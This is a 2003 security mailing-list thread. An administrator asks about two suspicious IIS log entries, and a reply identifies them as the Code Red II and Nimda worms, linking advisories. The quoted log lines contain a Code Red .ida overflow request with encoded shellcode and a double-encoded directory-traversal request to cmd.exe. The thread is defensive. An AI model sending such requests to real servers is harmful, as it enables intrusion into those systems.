RE: Suspicious IIS Log entry

["Paul Kurczaba" <paul () myipis com>]

The first entry is the Code Red II Worm:

http://www.cert.org/incident_notes/IN-2001-09.html
http://www.microsoft.com/technet/treeview/default.asp?url=/technet/securit
y/virus/newred.asp

The second entry is the Nimda Worm:

http://www.cert.org/advisories/CA-2001-26.html
http://www.microsoft.com/technet/treeview/default.asp?url=/technet/securit
y/virus/nimda.asp

-Paul Kurczaba

-----Original Message-----
From: Toby Schau [mailto:Toby.Schau () iacudiv state ia us]
Sent: Tuesday, September 09, 2003 12:43 PM
To: 'Security-Basics () Securityfocus com'
Subject: Suspicious IIS Log entry


I found the following suspicious entries in my IIS log files. Does anyone
recognize the specific vulnerabilities that are attempted to be exploited?

[ex030809.log (20)] : 2003-08-09 05:14:10 xxx.xx.xx.xx- xx.xx.xx.xx 80 GET
/default.ida
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u
90
90%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090
%u
9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a 404 -

[ex030908.log (201)] : 2003-09-08 06:31:02 xx.xxxxx.xxx - xxx.xx.xxx.xx 80
GET /<Rejected-By-UrlScan> ~/scripts/..%255c%255c../winnt/system32/cmd.exe
404 -
Thanks


--------------------------------------------------------------------------
-
Captus Networks
Are you prepared for the next Sobig & Blaster?
 - Instantly Stop DoS/DDoS Attacks, Worms & Port Scans
 - Precisely Define and Implement Network Security
 - Automatically Control P2P, IM and Spam Traffic
FIND OUT NOW -  FREE Vulnerability Assessment Toolkit
http://www.captusnetworks.com/ads/42.htm
--------------------------------------------------------------------------
--

Attachment: smime.p7s
Description: